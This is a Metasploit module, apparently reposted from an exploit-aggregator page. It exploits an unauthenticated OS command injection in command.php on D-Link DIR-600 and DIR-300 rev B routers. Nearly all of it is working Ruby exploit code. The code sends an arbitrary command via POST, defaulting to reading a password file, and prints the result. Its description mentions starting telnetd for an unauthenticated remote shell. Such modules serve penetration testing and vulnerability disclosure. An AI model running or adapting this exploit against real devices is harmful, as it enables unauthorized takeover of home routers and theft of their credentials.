Share
## https://sploitus.com/exploit?id=PACKETSTORM:180840
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution',  
'Description' => %q{  
This module exploits an OS Command Injection vulnerability in some D-Link  
Routers like the DIR-600 rev B and the DIR-300 rev B. The vulnerability exists in  
command.php, which is accessible without authentication. This module has been  
tested with the versions DIR-600 2.14b01 and below, DIR-300 rev B 2.13 and below.  
In order to get a remote shell the telnetd could be started without any  
authentication.  
},  
'Author' => [ 'Michael Messner <devnull[at]s3cur1ty.de>' ],  
'License' => MSF_LICENSE,  
'References' => [  
[ 'OSVDB', '89861' ],  
[ 'EDB', '24453' ],  
[ 'URL', 'https://eu.dlink.com/uk/en/products/dir-600-wireless-n-150-home-router' ],  
[ 'URL', 'http://www.s3cur1ty.de/home-network-horror-days' ],  
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-003' ]  
],  
'DisclosureDate' => '2013-02-04'  
)  
)  
  
register_options(  
[  
Opt::RPORT(80),  
OptString.new('CMD', [ true, 'The command to execute', 'cat var/passwd'])  
]  
)  
end  
  
def run  
uri = '/command.php'  
  
print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])  
  
data_cmd = "cmd=#{datastore['CMD']}; echo end"  
  
begin  
res = send_request_cgi(  
{  
'uri' => uri,  
'method' => 'POST',  
'data' => data_cmd  
}  
)  
return if res.nil?  
return if (res.headers['Server'].nil? || res.headers['Server'] !~ (%r{Linux,\ HTTP/1.1,\ DIR}))  
return if res.code == 404  
rescue ::Rex::ConnectionError  
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")  
return  
end  
  
if res.body.include?('end')  
print_good("#{rhost}:#{rport} - Exploited successfully\n")  
print_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n")  
print_line("#{rhost}:#{rport} - Output: #{res.body}")  
else  
print_error("#{rhost}:#{rport} - Exploit failed")  
end  
end  
end